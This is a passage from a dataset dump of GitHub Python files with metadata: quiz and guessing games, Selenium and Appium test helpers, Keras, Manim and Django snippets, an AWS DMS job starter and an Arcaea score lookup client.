questions=f1.readlines()\n n,m=0,0\n for q in questions:\n m+=1\n print(q[:q.index(\"=\")+1])\n ans=q[q.index(\"=\")+1:q.index(\"\\n\")]\n #print(ans)\n with open(\"answers.txt\",\"r+\") as f2:\n f2.read()\n ansin=input()\n #print(ansin)\n f2.write(ansin+\"\\n\")\n if(ansin==ans):\n n+=1\n print(\"Your score is {}/{}\".format(n,m))\n","repo_name":"Eldo123/Python-Projects","sub_path":"Simple Projects/Q&A/Q&A.py","file_name":"Q&A.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74281608039","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\ndriver = webdriver.Chrome()\n\nurl = 'http://automationpractice.com/index.php?id_category=3&controller=category'\ndriver.get(url)\n\n\nproduct_containers = driver.find_elements_by_class_name('product-container')\n\n# enumerate() is used\nfor index,product_container in enumerate(product_containers):\n time.sleep(2)\n hover = ActionChains(driver).move_to_element(product_container)\n hover.perform()\n\n #click on add to cart\n #('//*[@id=\"center_column\"]/ul/li[1]/div/div[2]/div[2]/a[1]/span') is changed to\n #('//*[@id=\"center_column\"]/ul/li[%s]/div/div[2]/div[2]/a[1]/span'%(index+1))\n # index of the list is replaced by %s which is the index each iteration since we adding in the cart each\n # of the item\n\n driver.find_element_by_xpath('//*[@id=\"center_column\"]/ul/li[%s]/div/div[2]/div[2]/a[1]/span'%(index+1)).click()\n\n time.sleep(5)\n #click on Continue Shopping\n driver.find_element_by_css_selector('#layer_cart > div.clearfix > div.layer_cart_cart.col-xs-12.col-md-6 > div.button-container > span > span > i').click()\n print(index)\n\n\n\n\n\n","repo_name":"greenwarrior/AutomationTesting_PYTHON","sub_path":"API_Scripting_Python/3_4_SeleniumPageSetup.py","file_name":"3_4_SeleniumPageSetup.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3016784335","text":"# -*- coding: utf-8 -*-\nimport unittest\nfrom tests.sensors.simulated_topology_sensor import SimulatedTopologySensor\nfrom tests.topology.topology_factory import TopologyFactory\nfrom topology.topology_map import OUT_OF_BOUNDS\nfrom geometry.point import Point2D\n\nX = OUT_OF_BOUNDS # For convenience in test comparisons, just call it X\n\n\nclass TestSimulatedTopologySensor(unittest.TestCase):\n \"\"\"\n Remember that in the test cases, the expected matrices must be flipped because\n increasing row means decreasing Y\n \"\"\"\n\n def setUp(self):\n simulated_map = TopologyFactory.make_from_matrix([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])\n self.sensor = SimulatedTopologySensor(simulated_map, power_on_cost=10, scan_point_cost=2)\n\n def test_scan_points(self):\n \"\"\"\n Just one test because it's trivial. Try scanning a row, with values out of bounds on both sides\n :return:\n \"\"\"\n home_point = Point2D(0, 1) # value is 5 at row 1 column 0\n offsets = [(-1, 0), (0, 0), (1, 0), (100, 100)]\n expecting = [(-1, 0, X, Point2D(-1, 1)), (0, 0, 5, Point2D(0, 1)), (1, 0, 6, Point2D(1, 1)),\n (100, 100, X, Point2D(100, 101))]\n scan_results, scan_cost = self.sensor.scan_points(offsets, home_point)\n self.assertEqual(expecting, scan_results)\n\n def test_scan_cost(self):\n home_point = Point2D(0, 1) # value is 5 at row 1 column 0\n offsets = [(-1, 0), (0, 0), (1, 0), (100, 100)]\n _, scan_cost = self.sensor.scan_points(offsets, home_point)\n\n def test_scan_total_cost(self):\n home_point = Point2D(0, 1) # value is 5 at row 1 column 0\n offsets = [(-1, 0), (0, 0), (1, 0), (100, 100)]\n self.sensor.scan_points(offsets, home_point)\n self.sensor.scan_points(offsets, home_point)\n self.assertEqual(16, self.sensor._total_cost)\n\n def test_scan_point_count(self):\n home_point = Point2D(0, 1) # value is 5 at row 1 column 0\n offsets = [(-1, 0), (0, 0), (1, 0), (100, 100)]\n self.sensor.scan_points(offsets, home_point)\n self.sensor.scan_points(offsets, home_point)\n self.assertEqual(8, self.sensor._scan_point_count)\n","repo_name":"howientc/jeep-navigation","sub_path":"tests/sensors/test_simulated_topology_sensor.py","file_name":"test_simulated_topology_sensor.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5484138242","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\n\n\nclass Caseread(object):\n try:\n casedata = load_workbook('./AppiumCase/autotestcase-backup.xlsx')\n except (AttributeError, FileNotFoundError):\n print(\"读取文件出错\")\n\n # 注释:用字典的方法存储Appium Case;\n # 注释:取值用法 appiumcase 中 key 值是用例名称;有几个key 即有几条 case 用法:len(appiumcase)\n # 注释:每个 case 中的操作步骤使用 二维list 存值;二维list 长度为几 case actionnumber 即为几 用法:len(Caseread.readdata()['匹配音频'])\n # 注释:每个 actionnumber list 中:0 -- Elementlocatemode、1 -- Element、2 -- Action、3 -- Content\n @classmethod\n def readdata(cls):\n casenumber = len(cls.casedata.sheetnames)\n casename = cls.casedata.sheetnames\n # 用例值存字典;读取到之后直接写入字典;即可存储多个值\n appiumcase = {}\n for index in range(casenumber):\n case = cls.casedata[casename[index]]\n row = 3\n actionum = case.cell(row=row, column=2).value\n casedetail = []\n while actionum:\n elementname = case.cell(row=row, column=3).value\n elementlocatemode = case.cell(row=row, column=4).value\n element = case.cell(row=row, column=5).value\n action = case.cell(row=row, column=6).value\n content = case.cell(row=row, column=7).value\n attribute = case.cell(row=row, column=8).value\n casedetail.append([elementlocatemode, element, action, content, elementname, attribute])\n appiumcase[casename[index]] = casedetail\n row += 1\n actionum = case.cell(row=row, column=2).value\n return appiumcase\n\n\nif __name__ == '__main__':\n print(Caseread.readdata())\n print(len(Caseread.readdata()))\n print(len(Caseread.readdata()['用户登录']))\n","repo_name":"william-xiangzi/AppiumAutoTest","sub_path":"ExcleDataFetch.py","file_name":"ExcleDataFetch.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29661223406","text":"from xsertion import XCNNBuilder\nfrom data import get_cifar, val_split\n\nfrom keras.models import Model\nfrom keras.layers import Lambda, Input\nfrom keras.callbacks import EarlyStopping\n\nfrom kerasnet import get_kerasnet # Specify the model in a separate file.\n\n# Xsertion will log heavily on DEBUG level. Enable it if it is desired to see details logs.\nimport logging\nlogging.basicConfig(level=logging.DEBUG, filename='example.log') # Will put logs into example.log in cwd\n\n# A little utility to determine dimension ordering.\n\nimport keras.backend as K\ninput_shape = (3, 32, 32)\npr_axis = 1 # This is the \"chanel axis\" or here principal axis. We will separate (and put back) modalities along this.\nif K.image_dim_ordering() == 'tf':\n input_shape = (32, 32, 3)\n pr_axis = 3\n\n\n# Prepare the data\n\np = 1. # Use full dataset (i.e. retain 100% per-class examples)\nuse_c10 = True # Let's use CIFAR-10, set to false for 100\n\n# get_cifar utility will perform linear transform into YUV space\nnb_classes, X_train, Y_train, X_val, Y_val, X_test, Y_test = get_cifar(p=p, append_test=False, use_c10=use_c10)\nX_t, Y_t, X_v, Y_v = val_split(0.2, X_train, Y_train) # split training data 80/20 for Xsertion to use internally\n\n\nblueprint_model = get_kerasnet(nb_classes, input_shape, pr_axis) # get KerasNet appropriate for keras/tf/th config\n\n\n# Xsertion start\n\n# Xsertion understands specification of modalities as \"input model\" where outputs are modalities.\n# This model is not touched by Xsertion, only its outputs are used, feel free to go crazy here.\n# However you define the input to this model, its inputs has to match the input data that's passed to Xsertion (Duh).\ninp = Input(shape=input_shape)\nif K.image_dim_ordering() == 'tf':\n lb1 = Lambda(lambda x: x[:, :, :, 0:1], output_shape=(32, 32, 1))(inp)\n lb2 = Lambda(lambda x: x[:, :, :, 1:2], output_shape=(32, 32, 1))(inp)\n lb3 = Lambda(lambda x: x[:, :, :, 2:3], output_shape=(32, 32, 1))(inp)\nelse:\n lb1 = Lambda(lambda x: x[:, 0:1, :, :], output_shape=(1, 32, 32))(inp)\n lb2 = Lambda(lambda x: x[:, 1:2, :, :], output_shape=(1, 32, 32))(inp)\n lb3 = Lambda(lambda x: x[:, 2:3, :, :], output_shape=(1, 32, 32))(inp)\ninput_model = Model(input=inp, output=[lb1, lb2, lb3])\n\nalpha = 1 # alpha hyper\nbeta = 2 # beta hyper\nbuilder = XCNNBuilder(blueprint_model, input_model, alpha=alpha, beta=beta)\n# create an XCNNBuilder, Xsertion will go crazy tearing apart blueprint_model and transforming/analysing it for internal\n# use. Not considering training/data processing this is the most time consuming step.\n\nbuilder.set_xspot_strategy(strategy='after_pooling') # set after_pooling heuristic to be used for placing connections\n# Alternatively, go with 'resnet' for branching/merging topologies. Or just specify layernames if you have exact idea\n# where you want connections.\n\nbuilder.set_xcons(use_bn=False, activation='relu', bias=False) # Pass whatever keywords you could pass to Convolution,\n# to customise the connection/adjust it for your model. Here just turning off bias as an example).\n# Two special arguments are available, use_bn, which will insert appropriate BatchNormalistion along the connection.\n# Alternatively, use model_function to specify a function that returns a connection model (similar to input model)\n# to customise connections. It's signiture is (nb_filter, inbount_name=None, name=None)->Model. nb_filter will be set\n# to what Xsertion thinks number of filters along this connections should be.\n\nbuilder.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n# Anything that would go into vanilla compile.\n\nbuilder.fit(X_t, Y_t, batch_size=32, nb_epoch=80, validation_data=(X_v, Y_v), verbose=2,\n callbacks=[EarlyStopping(monitor='val_acc', min_delta=1e-4, patience=15, verbose=2)])\n# Anything that would go into fit. Note this does not perform any work yet.\n\n# Kick off Xsertion\n\nxcnn_model = builder.build() # This is a good time to go grab a cup of tea.\nbuilder.print_report() # Get some information about how building went.\n\n# Need to use different hypers?\nbuilder.alpha = 2\nxcnn_model = builder.build() # It will use cached measures to quickly give another model.\n# Note xcnn_model is not trained.\n\n# Feeling like it could be better?\n# Not sure if certain pairs of modalities are even sensible?\n# Try\nxcnn2_model = builder.build_scaled_double_xcon() # This will use another round of measures between pairs of modalities.\n# Note xcnn2_model is not trained.\n# Though it should be noted, we did not observe much gain when using this methodology. Instead consider,\n\n\nxcnn_iter_model = builder.build_iter(.1, Nasterov=True, iter_max=15, rep=1) # This will commence combined learning\n# to produce model. First parameter is initial learning rate. Nasterov controls whether Nasterov acceleration is applied\n# to adaptive momentum. If building process is too noisy and steps seem to be not sensible. Try adjusting learning rate.\n# If push comes to shove, increase reps (rep).\n\n# This produces trained model. But only on 80% training data that was supplied. For fair comparison, consider finishing\n# training using full training set.\n\n# Train.\n\n","repo_name":"karazijal/xsertion","sub_path":"example_kerasnet.py","file_name":"example_kerasnet.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"40065559743","text":"import sys\nimport json\nimport io\nimport pandas as pd\nimport numpy as np\nimport boto3\nimport requests\nimport urllib\nimport base64\nimport math\nimport time\nimport ast\nimport re\nimport psycopg2\nfrom psycopg2 import extras\nfrom datetime import datetime\nfrom custom_utils.utils import fetchFromS3, putToS3\nfrom awsglue.utils import getResolvedOptions\n\n\n# define job parameters\nargs = getResolvedOptions(\n sys.argv, [\"TEMP_BUCKET_NAME\", \"EPO_INSTITUTION_NAME\", \"DB_SECRET_NAME\", \"DMS_TASK_ARN\"])\nTEMP_BUCKET_NAME = args[\"TEMP_BUCKET_NAME\"]\nEPO_INSTITUTION_NAME = args[\"EPO_INSTITUTION_NAME\"]\nDB_SECRET_NAME = args[\"DB_SECRET_NAME\"]\nDMS_TASK_ARN = args[\"DMS_TASK_ARN\"]\n\ndef main(argv):\n\n dms_client = boto3.client(\"dms\")\n\n # check if dms task in READY state (initial deployment)\n response = dms_client.describe_replication_tasks(\n Filters=[\n {\n \"Name\": \"replication-task-arn\",\n \"Values\": [\n DMS_TASK_ARN\n ]\n }\n ]\n )\n status = response[\"ReplicationTasks\"][0][\"Status\"]\n print(f\"DMS Replication Task status: {status}\")\n if status in [\"ready\", \"stopped\"]:\n response = dms_client.start_replication_task(\n ReplicationTaskArn=DMS_TASK_ARN,\n StartReplicationTaskType='reload-target'\n )\n else:\n waiter = dms_client.get_waiter(\"replication_task_stopped\")\n # make waiter wait for a maximum of 30s x 80attempts = 2400s = 40min\n waiter.wait(\n Filters=[\n {\n \"Name\": \"replication-task-arn\",\n \"Values\": [\n DMS_TASK_ARN\n ]\n }\n ],\n WaiterConfig={\n \"Delay\": 30,\n \"MaxAttempts\": 80\n }\n )\n response = dms_client.start_replication_task(\n ReplicationTaskArn=DMS_TASK_ARN,\n StartReplicationTaskType='reload-target'\n )\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"UBC-CIC/Research-Innovation-Dashboard","sub_path":"back_end/cdk/glue/scripts/patents-etl/startDmsReplicationTask-patent.py","file_name":"startDmsReplicationTask-patent.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27606216804","text":"from manim import *\n\nclass DoubleArrowExample2(Scene):\n def construct(self):\n box = Square()\n p1 = box.get_left()\n p2 = box.get_right()\n d1 = DoubleArrow(p1, p2, buff=0)\n d2 = DoubleArrow(p1, p2, buff=0, tip_length=0.2, color=YELLOW)\n d3 = DoubleArrow(p1, p2, buff=0, tip_length=0.4, color=BLUE)\n Group(d1, d2, d3).arrange(DOWN)\n self.add(box, d1, d2, d3)\n\nclass DoubleArrowExample(Scene):\n def construct(self):\n circle = Circle(radius=2.0)\n d_arrow = DoubleArrow(start=circle.get_left(), end=circle.get_right())\n d_arrow_2 = DoubleArrow(tip_shape_end=ArrowCircleFilledTip, tip_shape_start=ArrowCircleFilledTip)\n group = Group(Group(circle, d_arrow), d_arrow_2).arrange(UP, buff=1)\n self.add(group)\n\nclass RightAngleExample(Scene):\n def construct(self):\n line1 = Line( LEFT, RIGHT )\n line2 = Line( DOWN, UP )\n rightangles = [\n RightAngle(line1, line2),\n RightAngle(line1, line2, length=0.4, quadrant=(1,-1)),\n RightAngle(line1, line2, length=0.5, quadrant=(-1,1), stroke_width=8),\n RightAngle(line1, line2, length=0.7, quadrant=(-1,-1), color=RED),\n ]\n plots = VGroup()\n for rightangle in rightangles:\n plot=VGroup(line1.copy(),line2.copy(), rightangle)\n plots.add(plot)\n plots.arrange(buff=1.5)\n self.add(plots)\n\nclass FilledAngle(Scene):\n def construct(self):\n l1 = Line(ORIGIN, 2 * UP + RIGHT).set_color(GREEN)\n l2 = (\n Line(ORIGIN, 2 * UP + RIGHT)\n .set_color(GREEN)\n .rotate(-20 * DEGREES, about_point=ORIGIN)\n )\n norm = l1.get_length()\n a1 = Angle(l1, l2, other_angle=True, radius=norm - 0.5).set_color(GREEN)\n a2 = Angle(l1, l2, other_angle=True, radius=norm).set_color(GREEN)\n q1 = a1.points # save all coordinates of points of angle a1\n q2 = a2.reverse_direction().points # save all coordinates of points of angle a1 (in reversed direction)\n pnts = np.concatenate([q1, q2, q1[0].reshape(1, 3)]) # adds points and ensures that path starts and ends at same point\n mfill = VMobject().set_color(ORANGE)\n mfill.set_points_as_corners(pnts).set_fill(GREEN, opacity=1)\n self.add(l1, l2)\n self.add(mfill)\n\nclass RightArcAngleExample(Scene):\n def construct(self):\n line1 = Line( LEFT, RIGHT )\n line2 = Line( DOWN, UP )\n rightarcangles = [\n Angle(line1, line2, dot=True),\n Angle(line1, line2, radius=0.4, quadrant=(1,-1), dot=True, other_angle=True),\n Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8, dot=True, dot_color=YELLOW, dot_radius=0.04, other_angle=True),\n Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED, dot=True, dot_color=GREEN, dot_radius=0.08),\n ]\n plots = VGroup()\n for angle in rightarcangles:\n plot=VGroup(line1.copy(),line2.copy(), angle)\n plots.add(plot)\n plots.arrange(buff=1.5)\n self.add(plots)\n\nclass AngleExample(Scene):\n def construct(self):\n line1 = Line( LEFT + (1/3) * UP, RIGHT + (1/3) * DOWN )\n line2 = Line( DOWN + (1/3) * RIGHT, UP + (1/3) * LEFT )\n angles = [\n Angle(line1, line2),\n Angle(line1, line2, radius=0.4, quadrant=(1,-1), other_angle=True),\n Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8, other_angle=True),\n Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED),\n Angle(line1, line2, other_angle=True),\n Angle(line1, line2, radius=0.4, quadrant=(1,-1)),\n Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8),\n Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED, other_angle=True),\n ]\n plots = VGroup()\n for angle in angles:\n plot=VGroup(line1.copy(),line2.copy(), angle)\n plots.add(VGroup(plot,SurroundingRectangle(plot, buff=0.3)))\n plots.arrange_in_grid(rows=2,buff=1)\n self.add(plots)","repo_name":"slowisfast2030/manimgl_1.6.1","sub_path":"project_tan/arrow_example.py","file_name":"arrow_example.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18101419152","text":"from rest_framework.pagination import LimitOffsetPagination, PageNumberPagination\nfrom django.core.paginator import InvalidPage\n\nclass ObjectLimitOffsetPagination(LimitOffsetPagination):\n\tdefault_limit = 2\n\tmax_limit = 10\n\nclass ObjectPageNumberPagination(PageNumberPagination):\n\tpage_size = 5\n\n\tdef paginate_queryset(self, queryset, request, view=None):\n\t\tpage_size = self.get_page_size(request)\n\t\tif not page_size:\n\t\t\treturn None\n\n\t\tpaginator = self.django_paginator_class(queryset, page_size)\n\t\tpage_number = request.query_params.get(self.page_query_param, 1)\n\t\tif page_number in self.last_page_strings:\n\t\t\tpage_number = paginator.num_pages\n\n\t\ttry:\n\t\t\tself.page = paginator.page(page_number)\n\t\texcept InvalidPage as exc:\n\t\t\treturn None\n\n\t\treturn super(ObjectPageNumberPagination, self).paginate_queryset(queryset, request)","repo_name":"compsat/ls-ganap","sub_path":"api/main_events/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12974427272","text":"#!/usr/bin/python3\n# AdventCode Day 1\n\nimport time\n\n# install requirements\n# python3 -m venv advent\n# source advent/bin/activate\n# python3 -m pip install time\n\nlValues = []\n\n#\ndebug = False\n#debug = True\n# input_list_sample = open(\"day8_sample.lst\").read().splitlines()\n# input_list = open(\"day1.lst\").read().splitlines()\n\nwith open('d1.lst', 'r') as f:\n lValues = [int(x) for x in f]\n # for line in f:\n # lValues.append( int( line.strip() ) )\n\n\ndef timing(f):\n def wrap(*args, **kwargs):\n time1 = time.time()\n ret = f(*args, **kwargs)\n time2 = time.time()\n print('{:s} function took {:.3f} ms'.format(f.__name__, (time2 - time1) * 1000.0))\n return ret\n return wrap\n\n\n@timing\ndef step1():\n larger = 0\n for idx in range(0, len(lValues) - 1):\n if lValues[idx + 1] - lValues[idx] > 0:\n larger += 1\n print(f\"nb values: {len(lValues)}, Augmentations: {larger}\")\n\ndef larger(values):\n incr=0\n for idx in range(0,len(values)-1):\n if values[idx+1]>values[idx]:\n incr+=1\n return incr\n\n@timing\ndef step11():\n print(f\"step 1: nb: {len(lValues)},{larger(lValues)}\")\n\n\ndef sum_windows(x):\n if x >= 0 and x <= len(lValues):\n return lValues[x] + lValues[x + 1] + lValues[x + 2]\n\ndef get_new_values(values):\n new_puzzle=[]\n for idx in range(0,len(values)-2):\n new_puzzle.append(sum(values[idx:idx+3]))\n return new_puzzle\n\n@timing\ndef step2():\n increased = 0\n new_puzzle=get_new_values(lValues)\n #print(f'{new_puzzle}')\n increased+=larger(new_puzzle)\n print(f\"step2: nb values: {len(new_puzzle)}, Augmentations: {increased}\")\n\n\n# 1709\nstep1()\nstep11()\n# 1761\nstep2()","repo_name":"edgd1er/AdventCode","sub_path":"2021/d1.py","file_name":"d1.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41897425635","text":"#! /usr/bin/env python\n\nimport numpy as np\nfrom scipy.io import loadmat\nfrom scipy.linalg import norm\n\n\ndef load_mat_features(data_mat_file, do_norm=True):\n data = loadmat(data_mat_file)\n\n if 'features' in data:\n features = data['features']\n elif 'feature' in data:\n features = data['feature']\n features = features.T\n else:\n raise Exception(\n 'Counld not find keyword \"feature\" or \"features\" in .mat file')\n\n# print \"features.shape: \", features.shape\n\n if do_norm:\n # print \"Normalize features\"\n ftr_norm = norm(features, axis=1)\n ftr_norm = ftr_norm.reshape((-1, 1))\n features = features / ftr_norm\n\n return features\n\n\nif __name__ == \"__main__\":\n data_mat_file = r'C:/zyf/dnn_models/face_models/lfw_eval_results/center_face_model_fixbug.mat'\n\n ftrs = load_mat_features(data_mat_file)\n\n print('ftrs.shape: {}'.format(ftrs.shape))\n","repo_name":"walkoncross/lfw-evaluation-zyf","sub_path":"restore_feat_mirror_and_concat/load_features.py","file_name":"load_features.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"28184141880","text":"import random as r\n\nval = 0\n\nwhile True:\n try:\n n = int(input('level: '))\n if n < 1 or 100 < n:\n continue\n else:\n val= r.randint(1,n)\n break\n except ValueError:\n continue\n\nwhile True:\n try:\n guess = int(input('Guess: '))\n if guess < 1 or 100 < guess:\n continue\n if guess == val:\n print ('Just right!')\n break\n elif guess < val:\n print ('Too small!')\n elif guess > val:\n print ('Too large!')\n\n except ValueError:\n continue\n except EOFError:\n break\n\n","repo_name":"OziMoa/CS50works","sub_path":"game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44135193494","text":"# python3\n# pairs_with_sums.py - Finds pairs of integers in an array of integer that given_sum to a given given_sum.\n\nfrom random import randint\nimport time\n\ndef find_int_pairs(section, given_sum, test=False):\n \"\"\"\n Helper function that does the iterating to find the pairs.\n Added this as a brute force method to compare relative performance.\n \"\"\"\n int_pairs = set()\n\n if test == True:\n section = sorted(section)\n\n for indx1, num1 in enumerate(section):\n for indx2, num2 in enumerate(section):\n if indx1 == indx2:\n continue\n if num1 + num2 == given_sum:\n if (num2, num1) not in int_pairs:\n int_pairs.add((num1, num2))\n elif num1 + num2 > given_sum:\n break\n\n return int_pairs\n\n\n\ndef pairs_with_given_sums(array, given_sum):\n \"\"\"\n Finds pairs of integers in an array of integer that given_sum to a given given_sum.\n \"\"\"\n array = sorted(array)\n\n mid_indx = round(len(array) / 2)\n mid = array[mid_indx]\n first = array[0]\n last = array[-1]\n \n # Check how the value compares with the integers\n if last * 2 < given_sum:\n return None\n elif first * 2 > given_sum:\n return None\n\n # When the integer pairs are all on the left half of the array\n elif mid > given_sum:\n left_half = array[:mid_indx]\n\n # If the given sum is very low, \n # this will divide the array in half until the\n # half point is smaller than the given sum.\n while mid > given_sum:\n mid_indx = round(len(left_half) / 2)\n mid = left_half[mid_indx]\n if mid > given_sum:\n left_half = left_half[: mid_indx]\n\n # If the given sum is less than the first \n array_mid_indx = len(left_half) - 1\n array_mid = left_half[array_mid_indx]\n diff_1 = array_mid - given_sum\n diff_2 = given_sum - mid\n if diff_1 > diff_2: \n while mid < given_sum:\n mid_indx += 1\n mid = left_half[mid_indx]\n left_half = array[: mid_indx + 1]\n else:\n while array_mid > given_sum:\n array_mid_indx -= 1\n array_mid = left_half[array_mid_indx]\n left_half = left_half[: array_mid_indx + 1]\n \n # Finds the integer pairs for the given section \n int_pairs = find_int_pairs(left_half, given_sum)\n\n # If the given_sum is less than the last element in the array, \n # this will lead to the most possible combinations\n elif last > given_sum:\n last_indx = len(array) - 1\n while mid > given_sum:\n last_indx -= 1\n last = array[last_indx]\n left_half = array[: last_indx + 1]\n \n # Finds the integer pairs for the given section \n int_pairs = find_int_pairs(left_half, given_sum)\n\n # When the integer pairs for the given_sum is somewhere near the middle\n elif mid * 2 > given_sum and last < given_sum:\n\n i = 0\n while first + mid < given_sum:\n i += 1\n first = array[i]\n middle = array[i - 1 : mid_indx + 1]\n\n # Finds the integer pairs for the given section \n int_pairs = find_int_pairs(middle, given_sum)\n \n # When the integer pairs are mostly in the right half of the array \n elif mid * 2 <= given_sum:\n\n i = 0\n while first + last < given_sum:\n i += 1\n first = array[i]\n right_half = array[i - 1:]\n\n # Finds the integer pairs for the given section \n int_pairs = find_int_pairs(right_half, given_sum)\n\n # if int_pairs is an empty set return None:\n if int_pairs != set():\n return int_pairs\n else:\n return None\n\n\n\ndef example():\n total_differences = []\n # Run both functions 10 times to compare performance\n for i in range(10):\n rand_array = []\n for i in range(0, 1000):\n\n x = randint(1, 100000)\n rand_array.append(x)\n\n given_sum = randint(0, 200000)\n print(given_sum)\n\n # Timing both function to see how my function compares to brute force method\n start = time.perf_counter()\n pairs_1 = pairs_with_given_sums(rand_array, given_sum)\n end = time.perf_counter()\n difference_1 = end - start\n\n start = time.perf_counter()\n pairs_2 = find_int_pairs(rand_array, given_sum, True)\n end = time.perf_counter()\n difference_2 = end - start\n \n # if pairs_2 != None and pairs_1 != None:\n # print(pairs_2 - pairs_1)\n differences = (difference_1, difference_2)\n total_differences.append(differences)\n\n function_1_avg_time = sum([diff[0] for diff in total_differences]) / len(total_differences)\n function_2_avg_time = sum([diff[1] for diff in total_differences]) / len(total_differences)\n print(f\"Function 1 took on avg: {function_1_avg_time} seconds, Function 2 took: {function_2_avg_time} seconds,\")\n \nif __name__ == \"__main__\":\n example()\n","repo_name":"GingerLee11/CCI_6ed","sub_path":"chapter_16/pairs_with_sums.py","file_name":"pairs_with_sums.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7286040196","text":"from django.contrib import messages\nfrom django.shortcuts import redirect\nfrom django.utils import timezone\nfrom django.views.decorators.http import require_POST\nfrom coupons.models import Coupon\nfrom coupons.forms.coupons import CouponApplyForm\nfrom cart.models import Cart\nfrom django.utils.translation import gettext_lazy as _\n\n\n@require_POST\ndef coupon_apply(request):\n now = timezone.now()\n url = request.META.get('HTTP_REFERER')\n form = CouponApplyForm(request.POST or None)\n if form.is_valid():\n try:\n code = form.cleaned_data.get('code')\n current_user = request.user\n cart = Cart.objects.get(user_id=current_user.id)\n cart.coupon = Coupon.objects.get(code__iexact=code,\n valid_from__lte=now,\n valid_to__gte=now,\n active=True)\n cart.save()\n messages.success(request, _(\"Купон успішно додано\"))\n return redirect(url)\n except Coupon.DoesNotExist:\n messages.info(request, _(\"Цього купону не існує\"))\n return redirect(url)\n","repo_name":"olievko/Djangoshop-PoliKram","sub_path":"coupons/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19333310205","text":"import websockets\nimport brotli\nimport json\n\nclear_list = ['Track Lost', 'Normal Clear', 'Full Recall', 'Pure Memory', 'Easy Clear', 'Hard Clear']\ndiff_list = ['PST', 'PRS', 'FTR', 'BYD']\n\nf = open('arc_namecache.txt', 'w')\nf.close()\n\n\ndef load_cache():\n cache = {}\n f = open('arc_namecache.txt', 'r')\n for line in f.readlines():\n ls = line.replace('\\n', '').split(' ')\n cache[ls[0]] = ls[1]\n f.close()\n return cache\n\n\ndef put_cache(d: dict):\n f = open('arc_namecache.txt', 'w')\n for key in d:\n f.write('%s %s\\n' % (key, d[key]))\n\n\ndef cmp(a):\n return a['rating']\n\n\ndef calc(ptt, song_list):\n best30_list = []\n best30_overflow = []\n brating = 0\n rall = 0\n for i in range(0, 40):\n if i <= 29:\n if i <= 9:\n try:\n rall += song_list[i]['rating']\n best30_list.append(song_list[i])\n brating += song_list[i]['rating']\n except IndexError:\n break\n else:\n try:\n best30_list.append(song_list[i])\n brating += song_list[i]['rating']\n except IndexError:\n break\n else:\n try:\n best30_overflow.append(song_list[i])\n except IndexError:\n break\n ball = brating\n brating /= 30\n rrating = 4 * (ptt - brating * 0.75)\n maxptt = ((ball + rall) / 40)\n return brating, rrating, maxptt, best30_list, best30_overflow\n\n\nasync def lookup(nickname: str):\n async with websockets.connect(\"wss://arc.estertion.win:616/\") as ws:\n await ws.send(\"lookup \" + nickname)\n buffer = \"\"\n while buffer != \"bye\":\n buffer = await ws.recv()\n if type(buffer) == type(b''):\n obj2 = json.loads(str(brotli.decompress(buffer), encoding='utf-8'))\n id = obj2['data'][0]['code']\n cache = load_cache()\n cache[nickname] = id\n put_cache(cache)\n return id\n\n\n\ndef best(id: str, num: int):\n if num < 1:\n return []\n result = []\n s = \"\"\n song_title, userinfo, scores = _query(id)\n s += \"%s's Top %d Songs:\\n\" % (userinfo['name'], num)\n for j in range(0, int((num - 1) / 15) + 1):\n for i in range(15 * j, 15 * (j + 1)):\n if i >= num:\n break\n try:\n score = scores[i]\n except IndexError:\n break\n s += \"#%d %s %s %.1f \\n\\t%s\\n\\tPure: %d(%d)\\n\\tFar: %d\\n\\tLost: %d\\n\\tScore: %d\\n\\tRating: %.2f\\n\" % (i+1, song_title[score['song_id']]['en'], diff_list[score['difficulty']], score['constant'], clear_list[score['clear_type']],\n score[\"perfect_count\"], score[\"shiny_perfect_count\"], score[\"near_count\"], score[\"miss_count\"], score[\"score\"], score[\"rating\"])\n result.append(s[:-1])\n s = 